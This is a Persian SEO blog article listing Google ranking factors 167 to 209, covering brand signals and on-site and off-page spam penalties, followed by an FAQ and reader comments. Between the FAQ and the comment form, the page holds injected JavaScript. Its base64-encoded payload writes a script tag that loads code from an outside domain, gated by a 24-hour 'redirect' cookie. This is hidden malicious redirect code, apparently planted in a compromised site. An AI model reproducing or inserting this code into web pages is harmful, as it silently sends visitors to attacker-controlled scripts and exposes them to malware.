۱۶۷. جستجوهای کلمه کلیدی+ نام برند

آیا افراد کلمه کلیدی خاصی را به همراه برند جستجو می کنند؟ به عنوان مثال: عوامل بک لینک و یا سئو ویکی دمی. در این صورت، وقتی کاربران کلمه کلیدی و نام برند را هم زمان در سرچ خود عنوان می کنند، Google به شما رتبه بهتری می دهد.

167- سایت‌هایی که صفحه فیسبوک و لایک دارند

 برندهایی که صفحه فیسبوک با تعداد لایک های زیاد دارند، در جستجو بهتر دیده می شوند.

۱۶۸. سایت‌هایی که صفحه توییتر با فالوورهای زیادی دارند

داشتن پروفایل های توییتر با تعداد زیادی فالوور از یک برند محبوب خبر می دهند.

۱۶۹.صفحه رسمی شرکت در لینکدین

بیشتر مشاغل حقیقی دارای صفحات لینکدین مخصوص کسب و کار آن شرکت هستند.

۱۷۰.نویسندگان شناخته شده

در فوریه 2013 ، مدیر عامل Google (اریک اشمیت) ادعا کرد: اطلاعات مرتبط با پروفایل های آنلاین تأیید شده مربوط به نویسندگان شناخته شده است، که مهم‌‌تراز محتواهای عادی است، چون جستجوگران بر روی نتایج تأیید شده بیشتر کلیک می‎ کنند.

۱۷۱.حقیقی بودن اکانت رسانه‌های اجتماعی

گوگل، جعلی بودن حساب های شبکه های اجتماعی را درک می کند. یک اکانت در شبکه های اجتماعی با 10000 فالوور و دو پست که هیچ تعاملی ندارد، با اکانتی که حاوی 10000 فالوور و تعاملات بسیار است تفاوت زیادی دارد.

۱۷۲.نمایش برند در باکس داستان‌های برتر

برندهای واقعا بزرگ همیشه در سایت های Top Stories ذکر می شوند. در واقع ، برخی از مارک ها حتی در صفحه اول سایتشان، اخبار مربوط به وب سایت خود را دارند.

۱۷۳. منشن بدون لینک نام برند

گاهی نام یک برند در سایت‌های گوناگون ذکر می‌شود، اما لینکی به آن سایت داده نمی شود. احتمالا گوگل نام های تجاری بدون لینک را به عنوان یک فاکتور اعتبار مورد بررسی قرار می دهد.

۱۷۴.  محل مشاغل

کسب و کارهای واقعی دفاتر دارند. این امکان وجود دارد که Google برای تعیین بزرگی و اعتبار برند تجاری یک سایت از اطلاعات مکانی سایت استفاده کند.

فاکتورهای سئو مربوط به اسپم  On-Site

۱۷۵. جریمه الگوریتم پاندا

سایت هایی با محتوای بی کیفیت پس از جریمه شدن توسط الگوریتم پاندا، کمتر در جستجو مشاهده می شوند.

۱۷۶. لینک دادن به سایت‌های بی اعتبار

لینک دادن به سایت‌های بی ارزش وبی اعتبار نشان می دهد که سایت شما هم کیفیت پایینی دارد. این عمل به دیده شدن سایت در موتورهای جستجو آسیب می زند.

۱۷۷.ریدایرکت‌ها (Redirects)

 تغییر آدرس های اشتباه تا حد ممکن نباید رخ دهد. این عامل موجب جریمه شدن سایت می‌شود، و نیز گاهی سایت را از حالت ایندکس خارج می‌کند.

۱۷۸.  پاپ آپ یا تبلیغات مزاحم

سند رسمی رهنمودهای Google Rater می گوید: که پنجره های بازشو(پاپ آپ ) و تبلیغات منحرف کننده و مزاحم نشانه یک سایت با کیفیت پایین است.

۱۷۹.  پاپ‌آپ‌های بینابین تمام صفحه

Google ممکن است سایت هایی را که پنجره های بازشو تمام صفحه را برای کاربران تلفن همراه نمایش می دهند را مجازات کند.

۱۸۰. بهینه‌سازی بیش از حد سایت

Google، افراد را به دلیل بهینه سازی بیش از حد سایت خود مجازات می کند و رتبه پایین به آنها می دهد. این موارد شامل: آوردن بیش ازحد کلمات کلیدی، پر کردن برچسب هدر، تزئین بیش از حد وب سایت.

۱۸۱. محتوای نامفهوم و خودکار (gibberish)

گوگل یک محتوای صحیح و قابل درک را از یک محتوای نامفهوم تشخیص می‌دهد، در نتیجه محتواهایی نامفهوم یا آن‌هایی که به‌ صورت خودکار توسط رایانه ها تولید شده‌اند را ایندکس نمی ‌کند.

۱۸۲. صفحات دروازه (Doorway Pages)

گوگل می خواهند صفحه ای که به شما نشان می دهد صفحه ای باشد که کاربر در نهایت در سایت می بیند. در حقیقت گوگل علاقه مند است سایتی که به گوگل نشان داده می‌شود با سایتی که کاربر می‌بیند یکسان باشد. اگر کاربران بعد از ورود به سایت شما به صفحه دیگری فرستاده شوند، این یک صفحه دروازه است، که در گوگل ذخیره شده و مورد پسند گوگل نیست. 

۱۸۳.تبلیغات بالای خط تا  (Fold) 

الگوریتم چیدمان صفحه سایت های دارای تبلیغات زیاد (و نه محتوای زیاد) را مجازات می کند.

۱۸۴. پنهان کردن لینک‌های وابسته

خیلی از سایت‌ها تلاش می‌کنند که لینک‌های وابسته‌ شان  را مخفی کنند. گوگل این کار را نمی پسندد و ممکن است آن ها را جریمه کند.

۱۸۵. فرد (FRED)

لقبی است که از سال 2017 به مجموعه ای از به روزرسانی های گوگل داده می شود.

فرد سایت های کم ارزش از نظر محتوا به همراه تبلیغات فراوان که در حال کسب درآمد هستند را هدف قرار می دهد  و در رتبه‌ بندی اعتبار کمتری به آن‌ها می‌دهد.

۱۸۶. سایت های وابسته

گوگل به هیچ وجه از سایت‌ های وابسته طرفداری نمی‌ کند و این سایت ها مورد پسندش نیستند. گوگل این سایت ها را که از سایت های وابسته کسب درآمد می کنند را بیشتر مورد نظارت قرار می دهد.

۱۸۷. محتوای تولید شده به صورت خودکار

به طور قابل ملاحظه ای Google از محتوای تولید شده خودکار متنفر است. اگر آنها مشکوک شوند که سایت شما محتوای تولید شده توسط رایانه را مورد استفاده قرار داده است، این امر می تواند منجر به مجازات یا از بین رفتن سایت از حالت ایندکس شود.

۱۸۸.  توجه بیش از حد به پیج رنک

توجه بیش از حد به پیج رنک با nofollow کردن تمامی لینک‌های خروجی یا بیشتر لینک‌های داخلی، ممکن است نشان دهنده بازی کردن با سیستم رتبه ‌بندی باشد.

۱۸۹. اسپم شدن آی پی آدرس

اگر آدرس IP سرور شما به عنوان اسپم در نظر گرفته شود، ممکن است تمامی سایت‌های موجود بر روی آن سرور را تحت تأثیر قرار دهد. 

۱۹۰. اسپم شدن متا تگ (Meta Tag)

با استفاده بیش از حد از کلمات کلیدی در برچسب های متا، گوگل متوجه این کار می شود، و قصد شما ایجاد رتبه بهتر با روش‌های غیرمجاز است و شما را جریمه می‌کند.

فاکتورهای سئو مربوط به اسپم Off Page 

۱۹۱. سایت هک شده

اگر سایت شما هک شود، امکان دارد از نتایج جستجو حذف شود. در حقیقت، پس از آنكه گوگل متوجه شد كه سایت Search Engine Land هك شده است، به طور کامل آن را از حالت ایندکس خارج کرد.

۱۹۲. نفوذ غیرطبیعی لینک‌ها

نفوذ ناگهانی (و غیر طبیعی) لینک ها نشانه مطمئنی ازلینک های جعلی است.

۱۹۳. جریمه پنگوئن

سایت هایی که توسط Google Penguin جریمه شده اند به طور قابل توجهی در جستجو کمتر دیده می شوند. الگوریتم پنگوئن اکنون بیشتر بر روی فیلتر کردن لینک های نامناسب وب سایت ها تمرکز دارد.

۱۹۴. درصد بالایی از لینک‌های کم کیفیت

لینک‌های متعددی از رفرنس هایی که معمولاً از روش‌های سئو کلاه سیاه ( مانند نظرات وبلاگ و پروفایل انجمن ها) استفاده می‌کنند، ممکن است نشان دهنده بازی با سیستم رتبه ‌بندی گوگل برای بالا رفتن امتیاز سایت باشد.

۱۹۵.  ‌لینک از سایت‌های غیرمرتبط

درصد بالایی از بک لینک های سایت های غیرمرتبط می توانند، احتمال جریمه سایت را افزایش دهند.

۱۹۶. اخطار لینک‌های غیر طبیعی

گوگل می‌تواند لینک‌های غیرمجاز را خیلی ساده تشخیص دهد. او بعد از پیدا کردن این لینک‌ها هزاران پیام در ابزار وبمستر به مالکان وب سایت‌ها ارسال می‌کند. در نتیجه این موضوع موجب کاهش رتبه سایت می‌شود.

۱۹۷. لینک از دایرکتوری‌های بی‌کیفیت

به گفته گوگل، بک لینک از دایرکتوری های با کیفیت پایین می تواند منجر به مجازات وب سایت شما شود.

۱۹۸. ویجت لینک‎ها (Widget Links)

گوگل  لینک‌هایی که هنگام ویجت کردن به صورت خودکار تولید می‌شوند را نمی پسندد.

۱۹۹.  لینک‌هایی از آی پی آدرس کلاس C یکسان

دریافت مقدارغیرطبیعی لینک ها از سایتهایی با همان IP سرور(آی پی آدرس یکسان )، ممکن است به Google کمک کند تشخیص دهد که لینک های شما از یک شبکه وبلاگ حاصل می شوند یعنی نشانه‌ای از لینک بیلدینگ شبکه‌ای می باشد.

۲۰۰. انکر تکست سَمی

داشتن انکر تکست که مرتبط با سایت شما نباشد، ولی کاربران را به سمت سایت شما بیاورد، ممکن است نشانه‌ای از اسپم یا سایت هک شده باشد. در هر دو مورد، امکان صدمه به رتبه سایت وجود دارد.

۲۰۱. لینک طبیعی اسپایک (Spik Link Unnatural)

گوگل در سال 2013 اعلام کرد که می تواند ورود قانونی لینک ها به یک صفحه را مجاز یا غیر مجاز تشخیص دهد. لینک های غیر طبیعی موجب پایین آوردن رتبه سایت می شود.

۲۰۲. بک لینک از مقالات و نشریات

به دلیل آنکه زمانی از از دایرکتوری مقالات و اطلاعیه های مطبوعاتی سو استفاده شده است برای لینک ‌سازی غیر طبیعی استفاده شده، گوگل روی لینک‌های این دو مورد حساسیت نشان می دهد. تا جایی که اکنون Google در بسیاری از موارد این دو استراتژی ایجاد لینک را “طرح لینک” می داند.

۲۰۳. جریمه‌های دستی گوگل

این جریمه‌ها در وبمسترتولز مدل های گوناگونی دارند که بیشتر آن‌ها جریمه برای لینک‌ سازی‌های سئو کلاه سیاه است. این جریمه ها به صورت دستی انجام می‌شود، و موجب  می‌‍شود وب سایت شما در نتایج جستجو محدود شود.

۲۰۴.  فروش لینک ها 

خرید و فروش لینک نیز از ممنوعات گوگل است و می‌تواند به قابلیت دیده شدن در موتورهای جستجو صدمه وارد کند. 

۲۰۵. Sandbox  گوگل

سایتهای جدیدی که ناگهان حجم زیادی از لینک ها را به دست می آورند، گوگل آن ها را در Google Sandbox قرار می دهد، که این امر به طور موقت قابلیت جستجو را محدود می کند.

۲۰۶.رقص گوگل (Google Dance)

Google Dance می تواند به طور موقت رتبه بندی ها را متزلزل کند. طبق اطلاعیه گوگل، این روش ممکن است، برای تعیین سایت‌هایی که قصد بازی با الگوریتم‌ها را دارند بسیار مفید باشد.

۲۰۷.  ابزار رد  (Disavow Tool) 

استفاده از ابزار Disavow ممکن است جریمه دستی یا الگوریتمی را برای سایت هایی که قربانی SEO منفی شده اند حذف کند.

۲۰۸. درخواست تجدید نظر

اگر توسط گوگل جریمه شده باشید، می‌توانید درخواست تجدید نظر بدهید. در صورتی که صحیح باشد، جریمه شما حذف می شود.

۲۰۹. طرح لینک موقت

Google افرادی را که پیوندهای ناخواسته ایجاد می کنند، و به سرعت حذف می کنند را شناسایی می کند. همچنین به عنوان یک طرح لینک سازی موقت بدانید که این کار موجب امتیاز منفی در گوگل می‌شود.

نتیجه

ویکی دمی از شما می خواهد با ارسال نظرات خود نسبت به این بحث بگویید کدام عامل رتبه بندی SEO از این لیست برای شما جدید بود؟ پیشنهادات و انتقادات خود را با ما در میان بگذارید. برای آموزش‌های بیشتر در حوزه سئو، مقالات منتشر شده در سایت ویکی دمی را مطالعه کنید.

سوالات متداول

از مهمترین فاکتورهای سئو در دامنه، به کدام موارد می توان اشاه کرد؟

مهمترین فاکتورهای سئو در دامنه عبارتند از: قدمت دامنه، وجود کلمه کلیدی در دامنه،مدت زمان خرید دامنه، شروع کلمه کلیدی در دامنه، تاریخچه دامنه و غیره اشاره کرد.

مهمترین فاکتورها برای سطح صفحه کدام است؟

قرار گرفتن کلمه کلیدی در تایتل، قرار گرفتن کلمه کلیدی در توضیحات، شروع عنوان با کلید واژه و قرار گرفتن کلیدواژه در H1 از مهمترین موارد هستند

آیا سن بک لینک ها تاثیری در گرفتن رتبه توسط گوگل دارد؟

بله،با توجه به صحبت های گوگل، هر چه تعداد قدمت و زمان ساخته شدن لینک ها بیشتر باشد، ارزش و اعتبار آن ها نسبت به لینک های تازه ساخته شده، بیشتر خواهد بود.

استفاده از کدهای اسکیما، چه تاثیری در رتبه سایت دارد؟

کد های اسکیما یا شما می تواند به افزایش نرخ کلیک سایت کمک کند. عموما سایت هایی که دارای میکرو فرمت ها هستند نسبت به دیگر سایت ها دارای رتبه بالاتری هستند

آیا پوگو استیکینگ، در کاهش رتبه تاثیر دارد؟

هنگامی که کاربری با سرچ کلمه کلیدی وارد سایت شما می شود و به هر دلیلی به نتایج جستجو با زدن دکمه بازگشت، باز می گردد، به این عمل پوگو استیکینگ گفته می شود؛ که گوگل به این عمل ارزش منفی می دهد و امکان کاهش رتبه نیز وجود دارد.

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*
*

2 × 1 =

0

 1. حمید

  سلام
  این که 200 تا فاکتور نیست.
  کی تکمیل میشه ؟

  24 مارس 2020 پاسخ
  • ویکی دمی

   سلام دوست عزیز
   بله فاکتور ها در حال تکمیل هستن و به زودی این مقاله آپدیت شده و سایر فاکتور ها قرار داده میشود

   25 مارس 2020 پاسخ
 2. حسام

  سلام خسته نباشید
  چرا ورودی های تکراری برای سئو ارزشمنده؟
  فاکتور ۱۳۹

  29 جولای 2019 پاسخ
  • ویکی دمی

   سلام سلامت باشید
   ورودی های تکراری یعنی کسانی که به سایت شما اومدن از مطالب سایت شما راضب بودن و مجدد به سایت شما برگشتن و این یعنی سایت شما به نوعی برای اون افراد برند شده و مرجع شناخته شده.
   به دلیل اینکه گوگل روز به روز به سمت رضایت کاربر میره، هر سایتی که بتونه رضایت کاربرانش رو جلب کنه از نظر گوگل ارزشمند تره
   پس این مورد یکی از فاکتور های سئو محسوب میشه

   30 جولای 2019 پاسخ
 3. مهسا

  یه جایی گفتین که محل سرور تاثیر داره روی سئو
  این یعنی چی؟

  29 جولای 2019 پاسخ
  • ویکی دمی

   هر چقدر سرور نزدیک تر باشه سرعت یه سایت و سرعت دسرسی به سایت بیشتره
   برای سایت های ایرانی خب طبیعتا مخاطب های سایت از ایران هستند پس هر چقدر سرور به ایران نزدیک تر باشه بهتره و اگه سرور توی ایران باشه که عالیه

   30 جولای 2019 پاسخ
 4. علیرضا محسنی

  بسیار عالی و کامل بود
  تشکر از شما

  17 جولای 2019 پاسخ
  • ویکی دمی

   ممنون
   یقیه فاکتور ها هم به زودی در سایت منتشر میشه به همین دلیل در آینده مجدد این مقاله را برسی کنید

   17 جولای 2019 پاسخ
 5. مرتضی عمویی

  چرا هنوز این مقاله ۵۰ تا فاکتور سئو رو گفته؟
  من هر روز دارم میام به امید آپدیت این مقاله
  لطفا مقالاتی که نیاز به آپذیت دارن دو ناقص هستند رو زودتر تکمیل کنید دیگه

  04 جولای 2019 پاسخ
  • ویکی دمی

   با سلام این مقاله هر ۳ روز آپدیت خواهد شد و بزودی ۲۰۰ فاکتور سئو بطور کامل در سایت قرار خواهد گرفت.

   04 آگوست 2019 پاسخ
 6. مجتبی

  عالی بود واقعا
  فقط چرا تعدادش خیلی کمتر از ۲۲۰ فاکتوره؟

  28 ژوئن 2019 پاسخ
  • admin

   با سلام ممنون از نظرتون، این مقاله درحال تکمیل شدن هستش و بزودی ۲۲۰ فاکتور قرار خواهد گرفت

   28 ژوئن 2019 پاسخ
 7. محمد رضایی

  خیلی خوب بود ممنون

  26 ژوئن 2019 پاسخ